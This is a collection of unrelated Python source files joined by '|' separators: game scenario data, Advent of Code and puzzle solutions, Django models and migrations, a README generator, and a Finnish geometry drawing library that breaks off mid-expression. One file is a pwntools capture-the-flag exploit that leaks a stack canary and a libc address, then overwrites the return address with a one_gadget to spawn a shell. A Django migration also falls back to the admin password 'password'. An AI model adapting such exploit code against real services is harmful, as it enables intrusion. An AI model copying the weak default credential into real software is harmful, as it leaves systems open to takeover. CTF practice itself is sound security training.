# NOTE(review): this script targets Python 2 (App Engine SDK era) — the
# final `print [...]` statement is not valid Python 3.
import os
import os.path as op
import sys
import json

# Make the local App Engine SDK importable before anything else.
appengine_path = op.expanduser('~/dev/google_appengine')
sys.path.append(appengine_path)
import dev_appserver
dev_appserver.fix_sys_path()  # otherwise fancy_urllib will not be found

# Authenticate the remote API with a local service account key.
service_account_key_path = op.join(op.abspath('.'), 'service_account_key.json')
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = service_account_key_path

from google.appengine.ext.remote_api import remote_api_stub
from main import Log

# NOTE(review): duplicated assignment (`project_id = project_id = ...`) —
# harmless, but one is redundant.
project_id = project_id = json.load(open('../project_ids.json'))['remote-api']
remote_api_stub.ConfigureRemoteApiForOAuth(
    '%s.appspot.com' % project_id,
    '/_ah/remote_api')

# NOTE(review): `Log` is imported a second time here — redundant.
from main import Log
# Dump all log entries ordered by date (Python 2 print statement).
print [l.text for l in Log.query().order(Log.date)]
|
from ED6ScenarioHelper import *
def main():
    # Maruga Mountain Trail (original comment: 玛鲁加山道).
    # Machine-generated scenario data for an ED6 (Trails in the Sky) map;
    # values are engine data, not hand-written logic.
    CreateScenaFile(
        FileName    = 'R0300 ._SN',
        MapName     = 'Rolent',
        Location    = 'R0300.x',
        MapIndex    = 21,
        MapDefaultBGM = "ed60022",
        Flags       = 0,
        EntryFunctionIndex = 0xFFFF,
        Reserved    = 0,
        IncludedScenario = [
            '',
            '',
            '',
            '',
            '',
            '',
            '',
            ''
        ],
    )

    # In-game display names (Chinese) referenced by index from the data below.
    BuildStringList(
        '@FileName',            # 8
        '洛连特方向',           # 9
        '玛鲁加矿山方向',       # 10
        '跳跳猫',               # 11
        '爆种铃兰',             # 12
        '跳跳猫',               # 13
        '爆种铃兰',             # 14
        '爆种铃兰',             # 15
    )

    DeclEntryPoint(
        Unknown_00       = -204000,
        Unknown_04       = 10,
        Unknown_08       = -156840,
        Unknown_0C       = 4,
        Unknown_0E       = 0,
        Unknown_10       = 0,
        Unknown_14       = 9500,
        Unknown_18       = -10000,
        Unknown_1C       = 0,
        Unknown_20       = 0,
        Unknown_24       = 0,
        Unknown_28       = 2800,
        Unknown_2C       = 262,
        Unknown_30       = 45,
        Unknown_32       = 0,
        Unknown_34       = 360,
        Unknown_36       = 0,
        Unknown_38       = 0,
        Unknown_3A       = 21,
        InitScenaIndex   = 0,
        InitFunctionIndex = 0,
        EntryScenaIndex  = 0,
        EntryFunctionIndex = 1,
    )

    # Character sprite sheets and their pattern files.
    AddCharChip(
        'ED6_DT09/CH10020 ._CH',             # 00
        'ED6_DT09/CH10021 ._CH',             # 01
        'ED6_DT09/CH10180 ._CH',             # 02
        'ED6_DT09/CH10181 ._CH',             # 03
        'ED6_DT09/CH10260 ._CH',             # 04
        'ED6_DT09/CH10261 ._CH',             # 05
        'ED6_DT09/CH10210 ._CH',             # 06
        'ED6_DT09/CH10211 ._CH',             # 07
    )

    AddCharChipPat(
        'ED6_DT09/CH10020P._CP',             # 00
        'ED6_DT09/CH10021P._CP',             # 01
        'ED6_DT09/CH10180P._CP',             # 02
        'ED6_DT09/CH10181P._CP',             # 03
        'ED6_DT09/CH10260P._CP',             # 04
        'ED6_DT09/CH10261P._CP',             # 05
        'ED6_DT09/CH10210P._CP',             # 06
        'ED6_DT09/CH10211P._CP',             # 07
    )

    # Map signposts / NPC placements.
    DeclNpc(
        X                   = -204120,
        Z                   = -20,
        Y                   = -168420,
        Direction           = 0,
        Unknown2            = 0,
        Unknown3            = 0,
        ChipIndex           = 0x0,
        NpcIndex            = 0xFF,
        InitFunctionIndex   = -1,
        InitScenaIndex      = -1,
        TalkFunctionIndex   = -1,
        TalkScenaIndex      = -1,
    )

    DeclNpc(
        X                   = -205010,
        Z                   = 5940,
        Y                   = -5850,
        Direction           = 0,
        Unknown2            = 0,
        Unknown3            = 0,
        ChipIndex           = 0x0,
        NpcIndex            = 0xFF,
        InitFunctionIndex   = -1,
        InitScenaIndex      = -1,
        TalkFunctionIndex   = -1,
        TalkScenaIndex      = -1,
    )

    # Field monster spawns (positions and battle table indices).
    DeclMonster(
        X           = -209000,
        Z           = 1000,
        Y           = -140000,
        Unknown_0C  = 0,
        Unknown_0E  = 0,
        Unknown_10  = 1,
        Unknown_11  = 1,
        Unknown_12  = 0xFFFFFFFF,
        BattleIndex = 0x65,
        Unknown_18  = 0,
        Unknown_1A  = 0,
    )

    DeclMonster(
        X           = -232000,
        Z           = 4000,
        Y           = -91000,
        Unknown_0C  = 150,
        Unknown_0E  = 2,
        Unknown_10  = 1,
        Unknown_11  = 1,
        Unknown_12  = 0xFFFFFFFF,
        BattleIndex = 0x67,
        Unknown_18  = 0,
        Unknown_1A  = 0,
    )

    DeclMonster(
        X           = -232000,
        Z           = 6000,
        Y           = -81000,
        Unknown_0C  = 0,
        Unknown_0E  = 0,
        Unknown_10  = 1,
        Unknown_11  = 1,
        Unknown_12  = 0xFFFFFFFF,
        BattleIndex = 0x66,
        Unknown_18  = 0,
        Unknown_1A  = 0,
    )

    DeclMonster(
        X           = -211000,
        Z           = 6000,
        Y           = -78000,
        Unknown_0C  = 332,
        Unknown_0E  = 2,
        Unknown_10  = 1,
        Unknown_11  = 1,
        Unknown_12  = 0xFFFFFFFF,
        BattleIndex = 0x68,
        Unknown_18  = 0,
        Unknown_1A  = 0,
    )

    DeclMonster(
        X           = -193000,
        Z           = 4000,
        Y           = -45000,
        Unknown_0C  = 279,
        Unknown_0E  = 2,
        Unknown_10  = 1,
        Unknown_11  = 1,
        Unknown_12  = 0xFFFFFFFF,
        BattleIndex = 0x70,
        Unknown_18  = 0,
        Unknown_1A  = 0,
    )

    # Interactable actor (a treasure chest; talk handler is Function_2).
    DeclActor(
        TriggerX            = -183530,
        TriggerZ            = 3930,
        TriggerY            = -44100,
        TriggerRange        = 1000,
        ActorX              = -182870,
        ActorZ              = 3930,
        ActorY              = -44100,
        Flags               = 0x7C,
        TalkScenaIndex      = 0,
        TalkFunctionIndex   = 2,
        Unknown_22          = 0,
    )

    ScpFunction(
        "Function_0_1DA",          # 00, 0
        "Function_1_1E0",          # 01, 1
        "Function_2_20C",          # 02, 2
    )

    # Function 0: map init — clear the event flag.
    def Function_0_1DA(): pass

    label("Function_0_1DA")

    ClearMapFlags(0x8000000)
    Return()

    # Function_0_1DA end

    # Function 1: entry hook — set camera/ambience, open/close chest visual
    # depending on whether scenario flag (0x53, 2) is already set.
    def Function_1_1E0(): pass

    label("Function_1_1E0")

    OP_16(0x2, 0xFA0, 0xFFFAD7B0, 0xFFFCA4A0, 0x3000E)
    Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x53, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_204")
    OP_6F(0x0, 0)
    Jump("loc_20B")

    label("loc_204")

    OP_6F(0x0, 60)

    label("loc_20B")

    Return()

    # Function_1_1E0 end

    # Function 2: treasure chest interaction — grant the item if the flag is
    # unset (and inventory allows), otherwise show the "empty chest" message.
    def Function_2_20C(): pass

    label("Function_2_20C")

    SetMapFlags(0x8000000)
    Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x53, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_307")
    OP_22(0x2B, 0x0, 0x64)
    OP_70(0x0, 0x3C)
    Sleep(500)
    Jc((scpexpr(EXPR_EXEC_OP, "OP_3E(0x1FC, 1)"), scpexpr(EXPR_END)), "loc_286")
    FadeToDark(300, 0, 100)
    OP_22(0x11, 0x0, 0x64)
    SetMessageWindowPos(-1, -1, -1, -1)
    SetChrName("")
    AnonymousTalk(
        (
            scpstr(SCPSTR_CODE_COLOR, 0x0),
            "得到了\x07\x02",
            "复苏药\x07\x00",
            "。\x02",
        )
    )
    CloseMessageWindow()
    OP_56(0x0)
    SetMessageWindowPos(72, 320, 56, 3)
    FadeToBright(300, 0)
    OP_A2(0x29A)
    Jump("loc_304")

    label("loc_286")

    FadeToDark(300, 0, 100)
    SetChrName("")
    AnonymousTalk(
        (
            "宝箱里装有\x07\x02",
            "复苏药\x07\x00",
            "。\x01",
            "不过现有的数量太多,\x07\x02",
            "复苏药\x07\x00",
            "不能再拿更多了。\x02",
        )
    )
    CloseMessageWindow()
    OP_56(0x0)
    FadeToBright(300, 0)
    OP_22(0x2C, 0x0, 0x64)
    OP_6F(0x0, 60)
    OP_70(0x0, 0x0)

    label("loc_304")

    Jump("loc_365")

    label("loc_307")

    FadeToDark(300, 0, 100)
    AnonymousTalk(
        (
            scpstr(SCPSTR_CODE_COLOR, 0x5),
            "宝箱里什么东西都没有。\x07\x00\x02",
        )
    )
    CloseMessageWindow()
    OP_56(0x0)
    FadeToBright(300, 0)
    OP_83(0xF, 0x7A)

    label("loc_365")

    Sleep(30)
    TalkEnd(0xFF)
    ClearMapFlags(0x8000000)
    Return()

    # Function_2_20C end

    SaveToFile()

Try(main)
|
import tkinter as tk
def textUpdate():
    """Copy the entry widget's current text onto the label."""
    new_text = entry.get()
    label.configure(text=new_text)
def scaleUpdate(e):
    """Resize the label's font to the scale value *e* (default family)."""
    new_font = ("", e)
    label.configure(font=new_font)
# Build the demo window: a label whose text comes from the entry (via the
# Update button) and whose font size follows the horizontal scale.
root = tk.Tk()
label = tk.Label(root)
label.pack()
entry = tk.Entry(root)
entry.pack()
tk.Button(root, text="Update", command=textUpdate).pack()
# Scale passes its current value to scaleUpdate on every change.
tk.Scale(root, orient = 'h', from_ = 10, to = 50,
         command=scaleUpdate).pack(fill=tk.X)
root.mainloop()
|
# AdventOfCode 2019 day 2 pt 1
# https://adventofcode.com/2019/day/2
# start 7:19am
# started over at 7:37am confused af
# solved pt 1 8:19am
#
# AdventOfCode 2019 day 2 pt 2
# start pt2 8:55 - paused 9:30
# unpaused 13:30
# solved pt2 13:50
def calcPt1(intcode):
    """Run an Intcode program (opcodes 1=add, 2=multiply, 99=halt).

    The program is mutated in place; the same list is also returned.
    Operands are position-mode: each instruction reads two source
    addresses and writes to a destination address.
    """
    pos = 0
    while pos < len(intcode):
        op = intcode[pos]
        if op == 99:
            break
        if op in (1, 2):
            src_a, src_b, dst = intcode[pos + 1:pos + 4]
            if op == 1:
                intcode[dst] = intcode[src_a] + intcode[src_b]
            else:
                intcode[dst] = intcode[src_a] * intcode[src_b]
        # Advance to the next 4-word instruction (unknown opcodes skipped).
        pos += 4
    return intcode
# Load the puzzle program (single comma-separated line of integers).
filepath = 'input_2019-2.txt'
with open(filepath) as fp:
    originalintcode = [int(x) for x in fp.readline().split(",")]

# Part 1: restore the "1202 program alarm" state (noun=12, verb=2) and run.
intcode = [x for x in originalintcode]
intcode[1] = 12
intcode[2] = 2
result = calcPt1(intcode)
print(result[0])  # 3716250

# pt 2
# Brute-force the (noun, verb) pair producing the target output.
for noun in range(100):
    for verb in range(100):
        xintcode = [x for x in originalintcode]  # fresh copy per attempt
        xintcode[1] = noun
        xintcode[2] = verb
        result = calcPt1(xintcode)
        if result[0] == 19690720:
            print( (100*noun)+verb )  # 6472
            # NOTE(review): only breaks the inner loop; the outer loop
            # keeps scanning remaining nouns — confirm intended.
            break
|
#!/usr/bin/python3
"""main.py: Holds the boilerplate code to show that this code solves
the 8 queens problem
"""
from queen import Queen
def main():
    """main: Run the 8-queens solver eight times and print each solution."""
    for attempt in range(8):
        solver = Queen(8)
        print("Solution {0} - {1}".format(attempt + 1, solver.place_queen(attempt)))

main()
|
INTRODUCTION = """# Coding Problems
This repository contains my solutions for various competitive programming problems.
Note: Not all source code offers a valid solution (yet). Most code does.
"""
from pathlib import Path
import re
ROOTS = {
"advent-of-code": Path("./problems/advent-of-code"),
"codechef": Path("./problems/codechef"),
"kattis": Path("./problems/kattis"),
}
LANGUAGES = ["cpp", "py"]
def markdownRow(cells):
    """Render *cells* as one markdown table row, e.g. ``|a|b|``."""
    joined = "|".join(str(cell) for cell in cells)
    return "|" + joined + "|"
class Problem:
    """A single solved problem, described by the path of its solution file.

    The path is expected to look like ``.../<title>/<solution><suffix>``:
    the parent directory names the problem and the suffix its language.
    """

    # Icon markup per language suffix.
    # NOTE(review): both values were empty f-strings in the original
    # (f"" with no placeholders) -- possibly stripped icon characters;
    # the pointless f prefixes are removed and the if/elif chain is a
    # simple dict lookup with "" for unknown suffixes.
    _LANGUAGE_ICONS = {".py": "", ".cpp": ""}

    def __init__(self, location: Path):
        self.title = location.parts[-2]
        self.language = location.suffix
        self.location = location
        self.header = ["day", "language", "location"]
        self.language_icon = self._LANGUAGE_ICONS.get(self.language, "")

    def getHeader(self):
        """Return the markdown header row for the generic problem table."""
        return markdownRow(self.header)

    def __str__(self):
        """Return one markdown table row: title, language, linked icon."""
        return markdownRow(
            [
                self.title,
                self.language,
                f"[{self.language_icon}]({self.location})",
            ]
        )
class AdventOfCodeProblem(Problem):
    """An Advent of Code day, which may have up to two solved parts."""

    def __init__(self, location1: Path, location2: Path):
        super().__init__(location1)
        # Part 2 may be missing; its cell then reads "N/A".
        self.location1 = f"[{self.language_icon}]({location1})"
        self.location2 = "N/A" if not location2 else f"[{self.language_icon}]({location2})"
        self.year = location1.parts[-3]
        self.day = location1.parts[-2]
        self.url = f"https://adventofcode.com/{self.year}/day/{self.day.lstrip('0')}"
        self.header = ["year", "day", "part1", "part2", "url"]

    def getHeader(self):
        """Header row for the Advent of Code table."""
        return markdownRow(self.header)

    def __str__(self):
        cells = [
            self.year,
            self.day,
            self.location1,
            self.location2,
            f"[<img src='https://adventofcode.com/favicon.png' width='24' height='24'>]({self.url})",
        ]
        return markdownRow(cells)
class CodeChefProblem(Problem):
    """A CodeChef problem; the row links back to the submission page."""

    def __init__(self, location: Path):
        super().__init__(location)
        self.url = f"https://www.codechef.com/submit/{self.title}"
        self.header = ["title", "solution", "url"]

    def getHeader(self):
        """Header row for the CodeChef table."""
        return markdownRow(self.header)

    def __str__(self):
        row = [
            self.title,
            f"[{self.language_icon}]({self.location})",
            f"[]({self.url})",
        ]
        return markdownRow(row)
class KattisProblem(Problem):
    """A Kattis problem; the row links back to the problem page."""

    def __init__(self, location: Path):
        super().__init__(location)
        self.url = f"https://open.kattis.com/problems/{self.title}"
        self.header = ["title", "solution", "url"]

    def getHeader(self):
        """Header row for the Kattis table."""
        return markdownRow(self.header)

    def __str__(self):
        row = [
            self.title,
            f"[{self.language_icon}]({self.location})",
            f"[]({self.url})",
        ]
        return markdownRow(row)
def collectProblemsWithRoot(root: Path):
    """Gather every solution file under *root*, sorted by problem title."""
    found = []
    for ext in LANGUAGES:
        found.extend(Problem(path) for path in root.glob(f"**/*.{ext}"))
    found.sort(key=lambda problem: problem.title)
    return found
def collectKattisProblems():
    """Collect Kattis solutions (one directory per problem), sorted by title."""
    found = []
    for ext in LANGUAGES:
        found.extend(KattisProblem(path)
                     for path in ROOTS["kattis"].glob(f"*/*.{ext}"))
    found.sort(key=lambda problem: problem.title)
    return found
def collectCodeChefProblems():
    """Collect CodeChef solutions (one directory per problem), sorted by title."""
    found = []
    for ext in LANGUAGES:
        found.extend(CodeChefProblem(path)
                     for path in ROOTS["codechef"].glob(f"*/*.{ext}"))
    found.sort(key=lambda problem: problem.title)
    return found
def collectAdventOfCodeProblems():
    """Collect AoC solutions, pairing part-1/part-2 files per day directory.

    Files are grouped (per language) by their parent day directory; a day
    with a single file gets ``None`` as its second part, otherwise the two
    paths are sorted so part 1 comes first.
    """
    found = []
    for ext in LANGUAGES:
        by_day = {}
        for path in ROOTS["advent-of-code"].glob(f"**/*.{ext}"):
            by_day.setdefault(path.parent, []).append(path)
        for files in by_day.values():
            if len(files) == 1:
                files.append(None)
            else:
                files.sort()
        found.extend(AdventOfCodeProblem(*files) for files in by_day.values())
    found.sort(key=lambda problem: int(problem.year + problem.day))
    return found
def collectProblems():
    """Collect all problems from every provider, keyed by provider name."""
    providers = {
        "advent-of-code": collectAdventOfCodeProblems(),
        "codechef": collectCodeChefProblems(),
        "kattis": collectKattisProblems(),
    }
    return providers
def problemsAsTable(section, problems):
    """Render *problems* as a markdown table under an ``# <section>`` header.

    Improvements: an empty problem list no longer raises IndexError (only
    the section header is returned), and the divider row is built with a
    single regex pass instead of two.
    """
    lines = [f"# {section}"]
    if problems:
        header = problems[0].getHeader()
        # Every letter/digit of the header becomes '-' in the divider row.
        divider = re.sub("[a-z0-9]", "-", header)
        lines.append(header)
        lines.append(divider)
        lines.extend(str(p) for p in problems)
    return "\n".join(lines)
def generateStatistics(problems, keys):
    """Build a small markdown table of per-provider problem counts."""
    rows = ["|Provider|Problem count|", "|-|-|"]
    rows.extend(f"|[{key}](#{key})|{len(problems[key])}|" for key in keys)
    return "\n".join(rows)
def generate():
    """Regenerate README.md from the collected problem tables.

    Improvements: the stray debug ``print(content)`` of the entire README
    body is removed, and the output encoding is pinned to UTF-8 so icon
    characters survive on every platform.
    """
    problems = collectProblems()
    content = [
        INTRODUCTION,
        generateStatistics(problems, ["advent-of-code", "codechef", "kattis"]),
        problemsAsTable("Advent of Code", problems["advent-of-code"]),
        problemsAsTable("Codechef", problems["codechef"]),
        problemsAsTable("Kattis", problems["kattis"]),
        "",
        "Icons from [Icons8](https://icons8.com)",
    ]
    with open("README.md", "w", encoding="utf-8") as fh:
        fh.write("\n".join(content))

if __name__ == "__main__":
    generate()
|
# Generated by Django 3.2.5 on 2021-07-12 22:28
from django.db import migrations
from django.conf import settings
def ensure_share_system_user(apps, schema_editor):
    """Make sure the SHARE system user and its canonical Source row exist."""
    ShareUser = apps.get_model('share', 'ShareUser')
    Source = apps.get_model('share', 'Source')
    username = settings.APPLICATION_USERNAME
    system_user = ShareUser.objects.filter(username=username).first()
    if system_user is None:
        # No system user yet -- create the trusted robot account.
        system_user = ShareUser.objects.create_robot_user(
            username=username,
            robot='',
            is_trusted=True,
        )
    Source.objects.update_or_create(
        user=system_user,
        defaults={
            'name': username,
            'long_title': 'SHARE System',
            'canonical': True,
        }
    )
def ensure_share_admin_user(apps, schema_editor):
    """Create the 'admin' superuser if it does not exist yet.

    The password comes from SHARE_ADMIN_PASSWORD, falling back to
    'password' (NOTE: weak default -- acceptable only for local dev).
    """
    import os
    ShareUser = apps.get_model('share', 'ShareUser')
    if not ShareUser.objects.filter(username='admin').exists():
        ShareUser.objects.create_superuser(
            'admin',
            os.environ.get('SHARE_ADMIN_PASSWORD', 'password')
        )
class Migration(migrations.Migration):
    """Data migration: guarantee the system and admin users exist."""

    dependencies = [
        ('share', '0060_auto_20210712_1715'),
    ]

    operations = [
        # Improvement: reverse_code=noop makes the migration reversible --
        # unapplying it simply leaves the created users in place (without
        # it, `migrate` backwards raises IrreversibleError).
        migrations.RunPython(
            code=ensure_share_system_user,
            reverse_code=migrations.RunPython.noop,
        ),
        migrations.RunPython(
            code=ensure_share_admin_user,
            reverse_code=migrations.RunPython.noop,
        ),
    ]
|
from django.db import models
class Sensor(models.Model):
    """A measurable quantity: either a physical device reading or a value
    derived from other sensors (a "virtual" sensor)."""

    name = models.CharField(max_length=50)
    abbreviation = models.CharField(max_length=30)
    description = models.TextField()
    unit_of_measure = models.CharField(max_length=20)
    picture = models.ImageField(upload_to="media/", null=True)
    # NOTE(review): Django choices are (stored value, display label); here
    # the mixed-case word is stored and the uppercase form displayed --
    # confirm that ordering is intentional before changing it, since the
    # stored values are part of the DB contents.
    type = models.CharField(
        max_length = 15,
        choices = ( ('Physical', 'PHYSICAL' ), ('Virtual', 'VIRTUAL') ),
        null=True
    ) #a virtual sensor is a sensor whose value is calculated from other real physical values
    # Set once on insert; never updated afterwards (auto_now_add).
    added_time = models.DateTimeField(auto_now_add=True)

    class Meta:
        db_table = 'sensor'
        default_permissions = ('view', 'add', 'change', 'delete' )

    def added_time_pretty(self):
        """Return the creation time formatted like '01 January 2021'."""
        return self.added_time.strftime("%d %B %Y")

    def description_short(self):
        """Return at most the first 300 characters of the description."""
        return self.description[:300]
|
from pwn import *
import sys
#config -------------------------------------------------------------------
# NOTE(review): arch is set to 'i386' but the payloads below use u64/p64
# and a 64-bit libc offset -- confirm the intended architecture.
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "../bin/skywriting"
HOST = "2020.redpwnc.tf"
PORT = 31034
# 'r' as first CLI argument attacks the remote service; otherwise the
# local binary is run under a pwntools process.
if len(sys.argv) > 1 and sys.argv[1] == 'r':
    conn = remote(HOST, PORT)
else:
    conn = process(FILE_NAME)
elf = ELF(FILE_NAME)
libc = ELF('../libc.so.6')
#libc_binsh = next(libc.search("/bin/sh"))
# Candidate one_gadget offsets inside libc, and the offset of
# __libc_start_main's return address relative to the libc base.
# NOTE(review): offsets are specific to the bundled libc build.
gadget = [0x4f2c5, 0x4f322, 0x10a38c]
off_main_ret = 0x21b97
def exploit():
    """Leak the stack canary and a libc address through an over-read,
    then overwrite main's return address with a one_gadget.

    Python 2 + pwntools script: payloads are str, and `print hex(...)`
    is Python 2 syntax.
    """
    notflag = "notflag{a_cloud_is_just_someone_elses_computer}\n\x00"
    conn.sendlineafter("sky? \n", "1")
    # canary leak: fill the buffer up to the canary's zero LSB so the
    # program's echo leaks the remaining 7 canary bytes after "AB"
    payload = "A"*0x88
    payload += "B"
    conn.sendafter("shot: ", payload)
    conn.recvuntil("AB")
    canary = "\x00" + conn.recv(7)  # low canary byte is always 0x00
    # libc leak: overflow up to the saved return address into libc
    payload = "A"*0x97
    payload += "B"
    conn.sendafter("shot: ", payload)
    conn.recvuntil("AB")
    libc_main_ret = u64(conn.recv(6)+"\x00\x00")
    libc_base = libc_main_ret - off_main_ret
    one_gadget = libc_base + gadget[0]
    print hex(libc_base)
    # final payload: restore the canary, pad over the saved base pointer,
    # then return into the one_gadget to pop a shell
    payload = "\x00"*0x88
    payload += canary
    payload += "\x00"*8
    payload += p64(one_gadget)
    conn.sendafter("shot: ", payload)
    conn.sendlineafter("shot: ", notflag)
    conn.interactive()

if __name__ == "__main__":
    exploit()
|
import configparser
# Module-level parser reused across calls.
config = configparser.ConfigParser()

# Default location of the framework's .properties file; now only a
# default so other machines and tests can supply their own path.
DEFAULT_CONFIG_PATH = 'C:/Users/richa.anand/PycharmProjects/POM_Using_Pytest/Pom_Project/Config/config.properties'

def read_property_file(section, key, config_path=DEFAULT_CONFIG_PATH):
    """Return the value of *key* inside *section* of a .properties file.

    Improvements: the hard-coded absolute path became an overridable
    default parameter, and the stray debug print of the value is gone.
    Raises configparser.NoSectionError for a missing section and KeyError
    for a missing key.
    """
    config.read(config_path)
    section_items = dict(config.items(section))
    return section_items[key]
|
# -*- coding: UTF-8 -*-
import kuva
from kuva import *
import kuvaaja
def piste(x, y, nimi = "", suunta = 0, piirra = True):
    """Draw the point (x, y); its label *nimi* is written towards
    *suunta* (degrees).  Drawing is skipped when *piirra* is False.
    Returns the tuple (x, y)."""
    p = (x, y)
    if piirra:
        kuva.piste(p, nimi, suunta)
    return p
def leikkauspiste(X, Y, nimi = "", suunta = 0, valinta = 0, piirra = True):
    """Like ``piste``, but the point is the intersection of the two
    geometric objects X and Y (line, segment, ray, circle ...).  When
    there are several intersection points, ``valinta`` (0, 1, ...) picks
    which one is used; for a given figure the choice should always behave
    the same way.  (Translated from the original Finnish docstring.)"""
    if(X["tyyppi"] == "suora" and Y["tyyppi"] == "suora"):
        # Line/line: solve for the parameter t along X from the two-point
        # forms of both lines, then evaluate X at t.
        x1 = float(X["A"][0])
        y1 = float(X["A"][1])
        x2 = float(X["B"][0])
        y2 = float(X["B"][1])
        u1 = float(Y["A"][0])
        v1 = float(Y["A"][1])
        u2 = float(Y["B"][0])
        v2 = float(Y["B"][1])
        t = (u2 * v1 - u1 * v2 + u1 * y1 + v2 * x1 - u2 * y1 - v1 * x1) / ((u2 - u1) * (y2 - y1) + (v1 - v2) * (x2 - x1))
        x = x1 + t * (x2 - x1)
        y = y1 + t * (y2 - y1)
    elif(X["tyyppi"] == "suora" and Y["tyyppi"] == "ympyra"):
        # Line/circle: substitute the parametric line (U,V) + t*(u,v)
        # into the circle equation and solve A*t^2 + B*t + C = 0;
        # the parity of `valinta` picks the +/- root.
        U = float(X["A"][0])
        V = float(X["A"][1])
        u = float(X["B"][0]) - U
        v = float(X["B"][1]) - V
        a = float(Y["keskipiste"][0])
        b = float(Y["keskipiste"][1])
        r = float(Y["sade"])
        A = u**2 + v**2
        B = 2 * u * (U - a) + 2 * v * (V - b)
        C = (U - a)**2 + (V - b)**2 - r**2
        diskr = B**2 - 4 * A * C
        if diskr < 0:
            # No real intersection: fall back to the nearest point on the line.
            diskrsqrt = 0
        elif valinta % 2 == 0:
            diskrsqrt = sqrt(diskr)
        else:
            diskrsqrt = -sqrt(diskr)
        t = (-B + diskrsqrt) / (2 * A)
        x = U + t * u
        y = V + t * v
    elif(X["tyyppi"] == "ympyra" and Y["tyyppi"] == "suora"):
        # Circle/line: delegate to the line/circle branch above.
        return leikkauspiste(Y, X, nimi, suunta, valinta, piirra)
    else:
        raise ValueError("leikauspiste: en osaa laskea näiden olioiden leikkauspistettä.")
    return piste(x, y, nimi, suunta, piirra)
def projektio(P, s, nimi = "", suunta = 0, piirra = True):
    """Draw the orthogonal projection of point P onto the line s."""
    dx = float(s["B"][0] - s["A"][0])
    dy = float(s["B"][1] - s["A"][1])
    # Parameter of the foot of the perpendicular along A -> B.
    t = (dx * (P[0] - s["A"][0]) + dy * (P[1] - s["A"][1])) / (dx**2 + dy**2)
    jalka = interpoloi(s["A"], s["B"], t)
    return piste(jalka[0], jalka[1], nimi, suunta, piirra)
def suora(A, B, nimi = "", kohta = 0.5, puoli = True, piirra = True, Ainf = True, Binf = True):
    """Draw the line/ray/segment through points A and B.

    The label is written at position ``kohta`` along AB (A is 0, B is 1)
    and ``puoli`` selects the side of the line it goes on.  When ``Ainf``
    is True the A end is unbounded (clipped to the figure's bounding
    box), and likewise ``Binf`` for the B end.  Returns a line object.
    (Translated from the original Finnish docstring.)"""
    if(A == B): B = (B[0] + 0.01, B[1])  # nudge B so the direction is defined
    if piirra:
        if Ainf:
            # Extend the A end to the clipping box of the figure.
            t = rajoitaLaatikkoon(B, A)
            if t == float("inf"): raise ValueError("suora: Ei voida piirtää rajoittamatonta suoraa. Rajaa kuva rajaa-funktiolla.")
            Ap = vekSumma(vekSkaalaa(B, 1 - t), vekSkaalaa(A, t))
        else:
            Ap = A
        if Binf:
            # Extend the B end to the clipping box of the figure.
            t = rajoitaLaatikkoon(A, B)
            if t == float("inf"): raise ValueError("suora: Ei voida piirtää rajoittamatonta suoraa. Rajaa kuva rajaa-funktiolla.")
            Bp = vekSumma(vekSkaalaa(A, 1 - t), vekSkaalaa(B, t))
        else:
            Bp = B
        paksuus = "{}pt".format(tikzLuku(0.75 * tila.haePaksuus()))
        tila.out.write("\\draw[line width={}] {} -- {};\n".format(paksuus, tikzPiste(muunna(Ap)), tikzPiste(muunna(Bp))))
        # Label direction is the normal of AB (degrees), flipped by `puoli`.
        suunta = 180 * atan2(B[0] - A[0], -(B[1] - A[1])) / pi
        nimeaPiste(interpoloi(A, B, kohta), nimi, suunta + 180 * int(puoli))
    return {"tyyppi": "suora", "A": A, "B": B}
def jana(A, B, nimi = "", kohta = 0.5, puoli = True, piirra = True):
    """Draw the line segment AB (``suora`` with both ends bounded)."""
    return suora(A, B, nimi, kohta, puoli, piirra, Ainf = False, Binf = False)
def puolisuora(A, B, nimi = "", kohta = 0.5, puoli = True, piirra = True):
    """Draw the ray from A through B (unbounded only on B's side)."""
    return suora(A, B, nimi, kohta, puoli, piirra, Ainf = False, Binf = True)
def suoraSuuntaan(A, u, v, nimi = "", kohta = 0.5, puoli = True, piirra = True):
    """Draw the full line through A with direction vector (u, v)."""
    B = (A[0] + u, A[1] + v)
    return suora(A, B, nimi, kohta, puoli, piirra)
def puolisuoraSuuntaan(A, u, v, nimi = "", kohta = 0.5, puoli = True, piirra = True):
    """Draw the ray from A with direction vector (u, v)."""
    B = (A[0] + u, A[1] + v)
    return puolisuora(A, B, nimi, kohta, puoli, piirra)
def kaari(keskipiste, sade, alkukulma, loppukulma, nimi = "", kohta = 0, puoli = True, piirra = True):
    """Like ``ympyra`` but draws only the arc from *alkukulma* to
    *loppukulma* (degrees).  Returns a circle object."""
    if piirra:
        with paksuus(0.75):
            kuvaaja.piirraParametri(
                lambda t: keskipiste[0] + sade * cos(t),
                lambda t: keskipiste[1] + sade * sin(t),
                pi * alkukulma / 180, pi * loppukulma / 180,
                nimi, pi * kohta / 180, kohta + 180 * int(not puoli)
            )
    return {"tyyppi": "ympyra", "keskipiste": keskipiste, "sade": sade}
def ympyra(keskipiste, sade, nimi = "", kohta = 0, puoli = True, piirra = True):
    """Draw the full circle with the given centre and radius.  The label
    is placed at *kohta* degrees on the arc, on the side chosen by
    *puoli*.  Returns a circle object."""
    return kaari(keskipiste, sade, 0, 360, nimi, kohta, puoli, piirra)
def etaisyys(A, B):
    """Return the Euclidean distance from point A to point B."""
    return sqrt((B[0] - A[0])**2 + (B[1] - A[1])**2)
def ymparipiirrettyYmpyra(A, B, C, nimi = "", kohta = 0, puoli = True, piirra = True):
    """Like ``ympyra``, but the circle is the circumscribed circle of
    triangle ABC.  (Translated from the original Finnish docstring.)"""
    ax = float(A[0])
    ay = float(A[1])
    bx = float(B[0])
    by = float(B[1])
    cx = float(C[0])
    cy = float(C[1])
    # Circumcentre by the standard determinant formula; the shared
    # denominator is proportional to the triangle's signed area (zero
    # for collinear points -> division error).
    # TODO: simplify
    x = 0.5 * (
        -ay*bx*bx+bx*bx*cy-by*cy*cy+by*ay*ay+ay*cx*cx-by*by*ay
        -by*cx*cx+ax*ax*by-cy*ay*ay+by*by*cy-ax*ax*cy+cy*cy*ay
    ) / (
        ax*by-ax*cy-ay*bx+ay*cx+bx*cy-by*cx
